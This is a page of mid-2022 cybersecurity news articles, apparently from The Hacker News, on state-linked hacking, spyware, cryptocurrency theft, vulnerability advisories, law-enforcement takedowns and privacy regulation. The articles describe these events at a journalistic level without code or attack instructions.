BigBrothers 2024 2023 2022 2021 2020
TrickBot Gang Shifted its Focus on "Systematically" Targeting Ukraine
8.7.22 BigBrothers Thehackernews
In what's being described as an "unprecedented" twist, the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022.
The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such as IcedID, CobaltStrike, AnchorMail, and Meterpreter.
Tracked under the names ITG23, Gold Blackburn, and Wizard Spider, the financially motivated cybercrime gang is known for its development of the TrickBot banking trojan and was subsumed into the now-discontinued Conti ransomware cartel earlier this year.
But merely weeks later, the actors associated with the group resurfaced with a revamped version of the AnchorDNS backdoor called AnchorMail that uses SMTPS and IMAP protocols for command-and-control communications.
"ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection," IBM Security X-Force analyst Ole Villadsen said in a technical report.
A noticeable shift in the campaigns involves the use of never-before-seen Microsoft Excel downloaders and the deployment of CobaltStrike, Meterpreter, and AnchorMail as first-stage payloads. The attacks are said to have commenced in mid-April 2022.
Interestingly, the threat actor leveraged the specter of nuclear war in its email ruse to spread the AnchorMail implant, a tactic that would be repeated by the Russian nation-state group tracked as APT28 two months later to spread data-stealing malware in Ukraine.
What's more, the Cobalt Strike sample deployed as part of a May 2022 campaign utilized a new crypter dubbed Forest to evade detection, the latter of which has also been used in conjunction with the Bumblebee malware, lending credence to theories that the loader is being operated by the TrickBot gang.
"Ideological divisions and allegiances have increasingly become apparent within the Russian-speaking cybercriminal ecosystem this year," Villadsen noted. "These campaigns provide evidence that Ukraine is in the crosshairs of prominent Russian cybercriminal groups."
The development comes as Ukrainian media outlets have been targeted with phishing messages containing malware-laced documents that exploit the Follina vulnerability to drop the DarkCrystal RAT on compromised systems.
The Computer Emergency Response Team of Ukraine (CERT-UA) has also warned of intrusions conducted by a group called UAC-0056 that involves striking state organizations with staffing-themed lures to drop Cobalt Strike Beacons on the hosts.
The agency, last month, further pointed out the use of Royal Road RTF weaponizer by a China-based actor codenamed the Tonto Team (aka Karma Panda) to target scientific and technical enterprises and state bodies located in Russia with the Bisonal malware.
Attributing these attacks with medium confidence to the advanced persistent threat (APT) group, SentinelOne said the findings demonstrate "a continued effort" on the part of the Chinese intelligence apparatus to target a wide range of Russian-linked organizations.
NIST Announces First Four Quantum-Resistant Cryptographic Algorithms
6.7.22 BigBrothers Thehackernews
The U.S. Department of Commerce's National Institute of Standards and Technology (NIST) has chosen the first set of quantum-resistant encryption algorithms that are designed to "withstand the assault of a future quantum computer."
The post-quantum cryptography (PQC) technologies include the CRYSTALS-Kyber algorithm for general encryption, and CRYSTALS-Dilithium, FALCON, and SPHINCS+ for digital signatures.
"Three of the selected algorithms are based on a family of math problems called structured lattices, while SPHINCS+ uses hash functions," NIST, which kicked off the standardization process in January 2017, said in a statement.
Cryptography, which underpins the security of information in modern computer networks, derives its strength from the difficulty of solving mathematical problems e.g., factoring large composite integers using traditional computers.
Quantum computers, should they mature enough, pose a huge impact on the current public-key algorithms, since what could take, say, trillions of years on a conventional computer to find the right key to decode a message could merely take days or hours, rendering them susceptible to brute-force attacks.
"If large-scale quantum computers are ever built, they will be able to break many of the public-key cryptosystems currently in use," the agency said. "This would seriously compromise the confidentiality and integrity of digital communications on the internet and elsewhere."
Complicating matters further is a critical threat called "hack now, decrypt later" wherein cyber adversaries harvest sensitive encrypted data sent today in hopes of breaking it in the future when quantum computing becomes available.
The four quantum-resistant algorithms chosen by NIST are said to rely on mathematical problems that are hard to solve on both classical and quantum computers, thereby securing data against cryptanalytic attacks.
The agency also plans to include four more algorithms before finalizing the post-quantum cryptographic standard, a process that's expected to be completed in about two years.
That said, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with NIST, is "strongly" recommending organizations to start preparing for the transition by following the Post-Quantum Cryptography Roadmap.
Pro-China Group Uses Dragonbridge Campaign to Target Rare Earth Mining Companies
6.7.22 BigBrothers Thehackernews
A pro-China influence campaign singled out rare earth mining companies in Australia, Canada, and the U.S. with negative messaging in an unsuccessful attempt to manipulate public discourse to China's benefit.
Targeted firms included Australia's Lynas Rare Earths Ltd, Canada's Appia Rare Earths & Uranium Corp, and the American company USA Rare Earth, threat intelligence firm Mandiant said in a report last week, calling the digital campaign Dragonbridge.
"It targeted an industry of strategic significance to the PRC, including specifically three commercial entities challenging the PRC's global market dominance in that industry," Mandiant noted.
The goal, the company noted, was to instigate environmental protests against the companies and propagate counter-narratives in response to potential or planned rare earths production activities involving the targets.
This comprised a network of thousands of inauthentic accounts across numerous social media platforms and forums, that worked in tandem to disseminate content that seemingly raised concerns over alleged environmental, health, and labor issues over the operations of the three firms.
Some of the bogus accounts masqueraded as Texas citizens in a public 1,200-member Facebook group called "STOP LYNAS! NO to Lynas Exporting and Creating Another Toxic Legacy," alleging the mining firm risks exposing local populations to radioactive contamination and poisoning.
A majority of the posts were primarily in English, with limited content written in Chinese and Malay. That said, the activity is said to have received only limited engagement in the form of likes and comments from other accounts.
This is not the first time the actor has been linked to disinformation operations conducted in support of the People's Republic of China (PRC). While earlier activities in June 2019 were primarily focused on discrediting pro-democracy protests in Hong Kong, they have since sought to physically mobilize protestors in the U.S. in response to the COVID-19 pandemic.
"DRAGONBRIDGE's targeting of additional rare earths mining companies underscores the campaign's ability to monitor developments and respond accordingly," the researchers said.
U.S. FCC Commissioner Asks Apple and Google to Remove TikTok from App Stores
1.7.22 BigBrothers Thehackernews
One of the commissioners of the U.S. Federal Communications Commission (FCC) has renewed calls asking for Apple and Google to boot the popular video-sharing platform TikTok from their app stores citing "its pattern of surreptitious data practices."
"It is clear that TikTok poses an unacceptable national security risk due to its extensive data harvesting being combined with Beijing's apparently unchecked access to that sensitive data," Brendan Carr, a Republican member of the FCC, wrote in a letter to Apple and Google's chief executives.
TikTok, in September 2021, disclosed that there are one billion people who use its app every month, making it one of the largest social media platforms after Facebook, YouTube, WhatsApp, Instagram, and WeChat.
Carr further emphasized that the short-form video service is far from just an app for sharing funny videos or memes, calling out its features as "sheep's clothing" intended to mask its core function as a "sophisticated surveillance tool" for amassing users' personal information.
The letter also references a litany of controversies that TikTok found itself in over the years, including skirting Android safeguards to track users online, accessing iOS clipboard information, and settling a class-action lawsuit for $92 million over allegations that it captured biometric and personal data from users in the U.S. without prior consent.
TikTok, which is owned by Beijing-based ByteDance and has denied ever sharing user data with the Chinese government, is back in the spotlight close on the heels of revelations from BuzzFeed News that U.S. users' data had been repeatedly accessed by employees based in China between September 2021 and January 2022 despite its assurances to the contrary.
"Everything is seen in China," a member of TikTok's Trust and Safety department was quoted as saying in a September 2021 meeting, while in another meeting held that month, a director referred to a Beijing-based engineer as a "Master Admin" who "has access to everything."
Last year, CNBC, citing former employees, similarly alleged that the social media app's Chinese parent company had access to TikTok's U.S. user data and that it's closely involved in the decision-making and product development.
In a statement shared with the business news publication, TikTok said engineers in locations outside of the U.S., including China, can be permitted access to U.S. user data on an "as-needed basis" under strict access controls.
TikTok has since announced that it's "changed the default storage location of U.S. user data" and that it's routing all information from its users in the country through infrastructure controlled by Oracle. However, Carr noted these efforts do not address the core concerns of data access.
"TikTok has long claimed that its U.S. user data has been stored on servers in the U.S. and yet those representations provided no protection against the data being accessed from Beijing," Carr said. "Indeed, TikTok's statement that '100% of U.S. user traffic is being routed to Oracle' says nothing about where that data can be accessed from."
It's worth noting that several U.S. military branches have already banned its members from using TikTok on government-issued devices due to possible security risks. In June 2020, the Indian government moved to block the app on similar grounds.
North Korean Hackers Suspected to be Behind $100M Horizon Bridge Hack
1.7.22 BigBrothers Thehackernews
The notorious North Korea-backed hacking collective Lazarus Group is suspected to be behind the recent $100 million altcoin theft from Harmony Horizon Bridge, citing similarities to the Ronin bridge attack in March 2022.
The finding comes as Harmony confirmed that its Horizon Bridge, a platform that allows users to move cryptocurrency across different blockchains, had been breached last week.
The incident involved the exploiter carrying out multiple transactions on June 23 that extracted tokens stored in the bridge and subsequently making away with about $100 million in cryptocurrency.
"The stolen crypto assets included Ether (ETH), Tether (USDT), Wrapped Bitcoin (WBTC) and BNB," blockchain analytics company Elliptic said in a new report. "The thief immediately used Uniswap a decentralized exchange (DEX) to convert much of these assets into a total of 85,837 ETH."
Days later, on June 27, the culprit is said to have begun moving funds amounting to $39 million through the Tornado Cash mixer service in an attempt to obfuscate the ill-gotten gains and make it difficult to trace the transaction trail back to the original theft.
Elliptic, which was able to "demix" the transactions, said it was in a position to further track the stolen funds funneled through the service to a number of new Ethereum wallets.
The company's attribution to the Lazarus Group stems from the threat actor's history of carrying out cryptocurrency thefts, including those targeting cross-chain bridges earlier this year, and the manner in which the funds were stolen and subsequently laundered.
"The theft was perpetrated by compromising the cryptographic keys of a multi-signature wallet likely through a social engineering attack on Harmony team members," it said. "Such techniques have frequently been used by the Lazarus Group."
"The relatively short periods during which the stolen funds stop being moved out of Tornado cash are consistent with [Asia-Pacific] nighttime hours," Elliptic added. "Although no single factor proves the involvement of Lazarus, in combination they suggest the group's involvement."
Harmony has since notified all cryptocurrency exchanges and involved law enforcement and blockchain forensic firms to help in the recovery of stolen assets. It's also offering "one final opportunity" for the cyber thieves to send the funds back with anonymity and "retain $10 million and return the remaining amount" by July 4, 2022, 11 p.m. GMT.
On top of that, it has promised a $10 million reward for any information that leads to the return of plundered virtual currencies.
The Horizon Bridge digital heist also arrives against the backdrop of a "crypto winter" that has witnessed a steep decline in cryptocurrency markets, sending prices of Bitcoin down below $20,000 and potentially risking a key source of income for the sanctions-hit North Korea.
In a related development, Sky Mavis, developers of the popular non-fungible token (NFT) video game Axie Infinity, announced this week the official restart of the Ronin Bridge following three different audits.
What's more, the European Parliament and Council reached a landmark agreement on Wednesday to force crypto platforms to provide identifying information on the originators and the beneficiaries in a bid to enforce transparency of crypto asset transfers.
"This is what payment service providers currently do for wire transfers," the Council said in a press statement. "This will ensure traceability of crypto asset transfers in order to be able to better identify possible suspicious transactions and block them."
CISA Warns of Active Exploitation of 'PwnKit' Linux Vulnerability in the Wild
29.6.22 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week moved to add a Linux vulnerability dubbed PwnKit to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation.
The issue, tracked as CVE-2021-4034 (CVSS score: 7.8), came to light in January 2022 and concerns a case of local privilege escalation in polkit's pkexec utility, which allows an authorized user to execute commands as another user.
Polkit (formerly called PolicyKit) is a toolkit for controlling system-wide privileges in Unix-like operating systems, and provides a mechanism for non-privileged processes to communicate with privileged processes.
Successful exploitation of the flaw could induce pkexec to execute arbitrary code, granting an unprivileged attacker administrative rights on the target machine and compromising the host.
It's not immediately clear how the vulnerability is being weaponized in the wild, nor is there any information on the identity of the threat actor that may be exploiting it.
Also included in the catalog is CVE-2021-30533, a security shortcoming in Chromium-based web browsers that was leveraged by a malvertising threat actor codenamed Yosec to deliver dangerous payloads last year.
Furthermore, the agency added the newly disclosed Mitel VoIP zero-day (CVE-2022-29499) as well as five Apple iOS vulnerabilities (CVE-2018-4344, CVE-2019-8605, CVE-2020-9907, CVE-2020-3837, and CVE-2021-30983) that were recently uncovered as having been abused by Italian spyware vendor RCS Lab.
To mitigate any potential risk of exposure to cyberattacks, it's recommended that organizations prioritize timely remediation of the issues. Federal Civilian Executive Branch Agencies, however, are required to mandatorily patch the flaw by July 18, 2022.
Italy Data Protection Authority Warns Websites Against Use of Google Analytics
27.6.22 BigBrothers Thehackernews
Following the footsteps of Austria and France, the Italian Data Protection Authority has become the latest regulator to find the use of Google Analytics to be non-compliant with E.U. data protection regulations.
The Garante per la Protezione dei Dati Personali, in a press release published last week, called out a local web publisher for using the widely used analytics tool in a manner that allowed key bits of users' personal data to be illegally transferred to the U.S. without necessary safeguards.
This includes interactions of users with the websites, the individual pages visited, IP addresses of the devices used to access the websites, browser specifics, details related to the device's operating system, screen resolution, and the selected language, as well as the date and time of the visits.
The Italian supervisory authority (SA) said that it arrived at this conclusion following a "complex fact-finding exercise" it commenced in collaboration with other E.U. data protection authorities.
The agency said the transfer of personal information violates the data protection legislation because the U.S. is a "country without an adequate level of protection," while highlighting the "possibility for U.S. government authorities and intelligence agencies to access personal data transferred without due guarantees."
The website in question, Caffeina Media SRL, has been given a period of 90 days to move away from Google Analytics to ensure compliance with GDPR. In addition, the Garante drew webmasters' attention to the unlawfulness of data transfers to the U.S. stemming from the use of Google Analytics, recommending that site owners switch to alternative audience measurement tools that meet GDPR requirements.
"Upon expiry of the 90-day deadline set out in its decision, the Italian SA will check that the data transfers at issue are compliant with the E.U. GDPR, including by way of ad-hoc inspections," it stated.
Earlier this month, the French data protection watchdog, the CNIL, issued updated guidance over the use of Google Analytics, reiterating the practice as illegal under the General Data Protection Regulation (GDPR) laws and giving affected organizations a period of one month to comply.
"The implementation of data encryption by Google has proven to be an insufficient technical measure because Google LLC encrypts the data itself and has the obligation to grant access or provide the imported data which is in its possession, including the encryption keys necessary to make the data intelligible," the regulator said.
Google told TechCrunch that it's reviewing the latest decision. In January 2022, the tech giant stressed that Google Analytics "does not track people or profile people across the internet" and that organizations can control the data gathered through the service.
The Mountain View-based firm, which hosts all the data collected through the analytics platform in the U.S., also said it offers an IP address masking function that, when enabled, anonymizes the information in local servers before it's transferred to any servers outside the E.U. It's worth noting that this feature is enabled by default with Google Analytics 4.
NSO Confirms Pegasus Spyware Used by at least 5 European Countries
23.6.22 BigBrothers Thehackernews
The beleaguered Israeli surveillanceware vendor NSO Group this week admitted to the European Union lawmakers that its Pegasus tool was used by at least five countries in the region.
"We're trying to do the right thing and that's more than other companies working in the industry," Chaim Gelfand, the company's general counsel and chief compliance officer, said, according to a report from Politico.
Acknowledging that it had "made mistakes," the company also stressed on the need for an international standard to regulate the government use of spyware.
The disclosure comes as a special inquiry committee was launched in April 2022 to investigate alleged breaches of E.U. law following revelations that the company's Pegasus spyware is being used to snoop on phones belonging to politicians, diplomats, and civil society members.
"The committee is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers," the European Parliament said in March 2022.
Earlier this February, the European Data Protection Supervisor (EDPS) called for a ban on the development and the use of commercial spyware in the region, stating that the technology's "unprecedented level of intrusiveness" could endanger users' right to privacy.
Pegasus, and its other counterparts like FinFisher and Cytrox, are designed to be stealthily installed on a smartphone by exploiting unknown vulnerabilities in software known as zero-days to seize remote control of the device and harvest sensitive data.
Infections are typically achieved by means of one-click attacks wherein targets are tricked into clicking on a link sent via messages on iMessage or WhatsApp, or alternatively using zero-click exploits that require no interaction.
Once installed, the spyware provides support for a broad range of capabilities that allows the operator to track the victim's whereabouts, eavesdrop on conversations, and exfiltrate messages from even encrypted apps like WhatsApp.
NSO Group, founded in 2010, has long maintained it only supplies the software to government customers for what it says is to tackle terrorism, drug trafficking, and serious crime, but evidence has shown widespread misuse of the software to keep tabs on political opponents, critics, activists, journalists, lawyers across the world.
"The use of Pegasus does not require cooperation with telecommunication companies, and it can easily overcome encryption, SSL, proprietary protocols, and any hurdle introduced by the complex communications worldwide," the Council of Europe noted in an interim report.
"It provides remote, covert, and unlimited access to the target's mobile devices. This Modus Operandi of the Pegasus clearly reveals its capacity to be used for targeted as well as indiscriminate surveillance."
Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine
22.6.22 BigBrothers Thehackernews
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware.
Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism A Very Real Threat.rtf" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.
Follina (CVE-2022-30190, CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, 2022, as part of its Patch Tuesday updates.
According to an independent report published by Malwarebytes, CredoMap is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) divulged last month as having been deployed against users in Ukraine.
The malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.
"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence," Malwarebytes said. "The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state."
It's not just APT28. CERT-UA has further warned of similar attacks mounted by Sandworm and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts.
The development comes as Ukraine continues to be a target for cyberattacks amidst the country's ongoing war with Russia, with Armageddon hackers also spotted distributing the GammaLoad.PS1_v2 malware in May 2022.
Chinese 'Gallium' Hackers Using New PingPull Malware in Cyberespionage Attacks
13.6.22 BigBrothers Thehackernews
A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa.
Called PingPull, the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications, according to new research published by Palo Alto Networks Unit 42 today.
Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017.
Over the past year, however, the group is said to have expanded its victimology footprint to include financial institutions and government entities located in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.
PingPull, a Visual C++-based malware, provides a threat actor the ability to access a reverse shell and run arbitrary commands on a compromised host. This encompasses carrying out file operations, enumerating storage volumes, and timestomping files.
"PingPull samples that use ICMP for C2 communications issue ICMP Echo Request (ping) packets to the C2 server," the researchers detailed. "The C2 server will reply to these Echo requests with an Echo Reply packet to issue commands to the system."
Also identified are PingPull variants that rely on HTTPS and TCP to communicate with its C2 server instead of ICMP and over 170 IP addresses associated with the group since late 2020.
It's not immediately clear how the targeted networks are breached, although the threat actor is known to exploit internet-exposed applications to gain an initial foothold and deploy a modified version of the China Chopper web shell to establish persistence.
"Gallium remains an active threat to telecommunications, finance and government organizations across Southeast Asia, Europe and Africa," the researchers noted.
"While the use of ICMP tunneling is not a new technique, PingPull uses ICMP to make it more difficult to detect its C2 communications, as few organizations implement inspection of ICMP traffic on their networks."
U.S. Agencies Warn About Chinese Hackers Targeting Telecoms and Network Service Providers
8.6.22 BigBrothers Thehackernews
U.S. cybersecurity and intelligence agencies have warned about China-based state-sponsored cyber actors leveraging network vulnerabilities to exploit public and private sector organizations since at least 2020.
The widespread intrusion campaigns aim to exploit publicly identified security flaws in network devices such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices with the goal of gaining deeper access to victim networks.
In addition, the actors used these compromised devices as route command-and-control (C2) traffic to break into other targets at scale, the U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) said in a joint advisory.
The perpetrators, besides shifting their tactics in response to public disclosures, are known to employ a mix of open-source and custom tools for reconnaissance and vulnerability scanning as well as to obscure and blend their activity.
The attacks themselves are facilitated by accessing compromised servers, which the agencies called hop points, from China-based IP addresses, using them to host C2 domains, email accounts, and communicate with the target networks.
"Cyber actors use these hop points as an obfuscation technique when interacting with victim networks," the agencies noted, detailing the adversary's pattern of weaponizing flaws in telecommunications organizations and network service providers.
Upon gaining a foothold into the network via an unpatched internet-facing asset, the actors have been observed obtaining credentials for user and administrative accounts, followed by running router commands to "surreptitiously route, capture, and exfiltrate traffic out of the network to actor-controlled infrastructure."
Last but not least, the attackers also modified or removed local log files to erase evidence of their activity to further conceal their presence and evade detection.
The agencies did not single out a specific threat actor, but noted that the findings reflect Chinese state-sponsored groups' history of aggressively striking critical infrastructure to steal sensitive data, emerging key technologies, intellectual property, and personally identifiable information.
The disclosure also arrives less than a month after the cybersecurity authorities revealed the most routinely exploited initial access vectors to breach targets, some of which include misconfigured servers, weak password controls, unpatched software, and failure to block phishing attempts.
"Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program," the agencies said.
FBI Seizes 'SSNDOB' ID Theft Service for Selling Personal Info of 24 Million People
8.6.22 BigBrothers Thehackernews
An illicit online marketplace known as SSNDOB was taken down in operation led by U.S. law enforcement agencies, the Department of Justice (DoJ) announced Tuesday.
SSNDOB trafficked in personal information such as names, dates of birth, credit card numbers, and Social Security numbers of about 24 million individuals in the U.S., generating its operators $19 million in sales revenue.
The action saw the seizure of several domains associated with the marketplace ssndob.ws, ssndob.vip, ssndob.club, and blackjob.biz in cooperation with authorities from Cyprus and Latvia.
According to blockchain analytics firm Chainalysis, SSNDOB's Bitcoin payment processing system has received nearly $22 million worth of Bitcoin across over 100,000 transactions since April 2015.
Furthermore, bitcoin transfers to the tune of more than $100,000 have been unearthed between SSNDOB and Joker's Stash, another darknet market that specialized in stolen credit card information and voluntarily closed shop in January 2021, indicating a close relationship between the two criminal storefronts.
"The SSNDOB administrators created advertisements on dark web criminal forums for the Marketplace's services, provided customer support functions, and regularly monitored the activities of the sites, including monitoring when purchasers deposited money into their accounts," the DoJ said in a statement.
Additionally, the cybercriminal actors are said to have employed tactics to conceal their true identities, including using anonymous online profiles, maintaining servers in different countries, and requiring potential buyers to use cryptocurrencies.
"Identity theft can have a devastating impact on a victim's long-term emotional and financial health," said Darrell Waldon, special agent in charge of IRS-CI Washington, D.C. Field Office. "Taking down the SSNDOB website disrupted ID theft criminals and helped millions of Americans whose personal information was compromised."
The takedown marks the continued ramping up of efforts on the part of law enforcement agencies across the world to disrupt malicious cyber activity.
Last week, Europol publicized the shut down of the FluBot Android banking trojan, while the Justice Department said it seized three domains used by cybercriminals to trade stolen personal information and facilitate distributed denial-of-service (DDoS) attacks for hire.
Earlier this year, the Federal Bureau of Investigation (FBI) also neutralized a modular botnet dubbed Cyclops Blink as well as dismantled RaidForums, a hacking forum notorious for selling access to hacked personal information belonging to users.
In a related development, the U.S. Treasury Department also sanctioned Hydra after German law enforcement authorities disrupted the world's largest and longest-running dark web marketplace in April 2022.
Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies
3.6.22 BigBrothers Thehackernews
Microsoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.
In addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created and that it notified affected organizations.
"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques," MSTIC assessed with "moderate confidence."
The adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.
Targets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what's a case of a supply chain attack.
In a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances (CVE-2018-13379), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.
Attack chains mounted by the actor have involved the use of custom tools that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 using malicious tools dubbed CreepyDrive and CreepyBox with its victims.
"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run," the researchers said.
This is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason disclosed an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.
Additionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called MuddyWater (aka Mercury), which has been characterized by the U.S. Cyber Command as a "subordinate element" within MOIS.
The victim overlaps lend credence to earlier reports that MuddyWater is a "conglomerate" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).
To counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.
ExpressVPN Removes Servers in India After Refusing to Comply with Government Order
3.6.22 BigBrothers Thehackernews
Virtual Private Network (VPN) provider ExpressVPN on Thursday announced that it's removing Indian-based VPN servers in response to a new cybersecurity directive issued by the Indian Computer Emergency Response Team (CERT-In).
"Rest assured, our users will still be able to connect to VPN servers that will give them Indian IP addresses and allow them to access the internet as if they were located in India," the company said. "These 'virtual' India servers will instead be physically located in Singapore and the U.K."
The development comes as the CERT-In has enforced new controversial data retention requirements that are set to come into effect on June 27, 2022, and mandate VPN service providers to store subscribers' real names, contact details, and IP addresses assigned to them for at least five years.
The logged user data, CERT-In emphasized, will only be requested for the purposes of "cyber incident response, protective and preventive actions related to cyber incidents."
The agency has since clarified that this rule does not apply to corporate and enterprise VPN solutions and are only aimed at those operators who provide proxy-like services to "general Internet subscribers/users."
"The new data law [...], intended to help fight cybercrime, is incompatible with the purpose of VPNs, which are designed to keep users' online activity private," ExpressVPN said. "The law is also overreaching and so broad as to open up the window for potential abuse."
The rules, dubbed Cyber Security Directions, also mandate firms to report incidents of security lapses such as data breaches and ransomware attacks within six hours of noticing them.
The move has not only sparked privacy concerns, but has also been criticized as ambiguous and overly broad, pointing out a lack of clarity on the scope of incidents that come under purview of the upcoming directive.
"Such excessive requirements for collecting and handing over data will not just impact VPN service providers but VPN users as well, harming their individual liberty and privacy," the Internet Freedom Foundation said in a statement.
"In the absence of sufficient oversight and a data protection framework to protect against misuse, such requirements have the potential to enable mass surveillance."
DOJ Seizes 3 Web Domains Used to Sell Stolen Data and DDoS Services
3.6.22 BigBrothers Thehackernews
The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of three domains used by cybercriminals to trade stolen personal information and facilitate distributed denial-of-service (DDoS) attacks for hire.
This includes weleakinfo[.]to, ipstress[.]in, and ovh-booter[.]com, the first of which allowed its users to traffic hacked personal data and offered a searchable database containing illegally amassed information obtained from over 10,000 data breaches.
The database consisted of seven billion indexed records featuring names, email addresses, usernames, phone numbers, and passwords for online accounts that could be accessed through different subscription tiers.
The shutdown of weleakinfo[.]to comes more than two years after a related internet domain named weleakinfo[.]com was confiscated in January 2020, with law enforcement officials arresting 21 individuals in connection to the operation later that year. Last May, one of its operators was sentenced to two years in prison.
The other two domains ipstress[.]in and ovh-booter[.]com offered to conduct DDoS services for their clients. DDoS attacks are carried out by flooding a targeted web resource with junk traffic with the goal of rendering it inaccessible to legitimate users of the service.
The "comprehensive law enforcement action" involved the Federal Bureau of Investigation (FBI), the U.S. Attorney's Office for the District of Columbia, and the DoJ's Computer Crime and Intellectual Property Section in coordination with authorities from Belgium and the Netherlands.
"These seizures are prime examples of the ongoing actions the FBI and our international partners are undertaking to disrupt malicious cyber activity," said FBI Special Agent in Charge, Wayne A. Jacobs, said.
"Disrupting malicious DDoS operations and dismantling websites that facilitate the theft and sale of stolen personal information is a priority for the FBI."
FBI Warns About Hackers Selling VPN Credentials for U.S. College Networks
31.5.22 BigBrothers Thehackernews
Network credentials and virtual private network (VPN) access for colleges and universities based in the U.S. are being advertised for sale on underground and public criminal marketplaces.
"This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber attacks against individual users or affiliated organizations," the U.S. Federal Bureau of Investigation (FBI) said in an advisory published last week.
The cyber intrusions against educational institutions involve threat actors leveraging tactics like spear-phishing and ransomware to carry out credential harvesting activities. The gathered credentials are then exfiltrated and sold on Russian cybercrime forums for prices ranging from a few to thousands of U.S. dollars.
Armed with this login information, the agency pointed out, adversaries can proceed to conduct brute-force credential stuffing attacks to break into victim accounts spanning different accounts, internet sites, and services.
"If attackers are successful in compromising a victim account, they may attempt to drain the account of stored value, leverage or re-sell credit card numbers and other personally identifiable information, submit fraudulent transactions, exploit for other criminal activity against the account holder, or use for subsequent attacks against affiliated organizations," the FBI cautioned.
For instance, in May 2021, the agency said it found more than 36,000 email and password combinations for email accounts ending in ".edu" domain publicly available on an instant messaging platform shared by a group that specialized in the trafficking of stolen login credentials.
To mitigate such threats, academic entities are urged to keep operating systems and software up to date, raise awareness about phishing, secure accounts with two-factor authentication, monitor remote access, and implement network segmentation to prevent the spread of malware.
Fronton: Russian IoT Botnet Designed to Run Social Media Disinformation Campaigns
23.5.22 BigBrothers Thehackernews
Fronton, a distributed denial-of-service (DDoS) botnet that came to light in March 2020, is much more powerful than previously thought, per the latest research.
"Fronton is a system developed for coordinated inauthentic behavior on a massive scale," threat intelligence firm Nisos said in a report published last week.
"This system includes a web-based dashboard known as SANA that enables a user to formulate and deploy trending social media events en masse. The system creates these events that it refers to as Инфоповоды, 'newsbreaks,' utilizing the botnet as a geographically distributed transport."
The existence of Fronton, an IoT botnet, became public knowledge following revelations from BBC Russia and ZDNet in March 2020 after a Russian hacker group known as Digital Revolution published documents that it claimed were obtained after breaking into a subcontractor to the FSB, the Federal Security Service of the Russian Federation.
Further investigation has traced the analytical system to a Moscow-based company known as Zeroday Technologies (aka 0Dt), with links identified to a Russian hacker by the name of Pavel Sitnikov, who was arrested in March 2021 on charges of distributing malicious software via his Telegram channel.
Fronton functions as the backend infrastructure of the social media disinformation platform, offering an army of compromised IoT devices for staging DDoS attacks and information campaigns by communicating with a front-end server infrastructure over VPNs or the Tor anonymity network.
SANA, on the other hand, is designed to create fake social media persona accounts and manufacture newsbreaks, which refer to events that create information "noise" with the goal of shaping online discourse by means of a response model that allows the bots to react to the news in a "positive, negative, or neutral fashion."
